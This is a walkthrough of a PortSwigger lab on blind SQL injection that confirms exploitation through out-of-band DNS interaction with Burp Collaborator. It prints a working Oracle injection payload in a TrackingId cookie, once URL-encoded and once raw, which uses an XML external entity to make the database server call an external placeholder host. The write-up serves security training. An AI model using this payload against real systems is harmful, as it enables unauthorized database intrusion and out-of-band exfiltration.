[This lab](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band) demonstrates how to leverage **blind SQL injection** for **out-of-band (OOB) interaction** using a **DNS-based side channel**. Since the SQL query executes asynchronously with no visible response, you must confirm exploitation through Burp Collaborator.
---
#### Step 1: Intercept and Modify the Cookie
1. Visit the lab homepage
2. In Burp → **Proxy → HTTP history**, find the request to `/`
3. Locate the `TrackingId` cookie:
```
TrackingId=xyz
```
4. Send the request to **Repeater**
---
#### Step 2: Inject SQLi Payload with DNS-Based OOB Call
Use Oracle's `EXTRACTVALUE()` on an **external entity** to trigger a DNS lookup:
```sql
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
```
Make sure you **URL-encode** the value inside the actual request (Burp can help):
Final payload in raw request:
```
TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--
```
_Tip: You can use right-click → **Insert Collaborator payload** directly in Repeater._
---
#### Step 4: Send the Request
1. Click **Send** in Repeater
2. Switch to the **Burp Collaborator Client**
3. Wait for a **DNS interaction** (should appear within seconds)
✅ If you see an **interaction from the lab**, the SQLi was successful
✅ Lab is solved automatically once Burp receives the DNS hit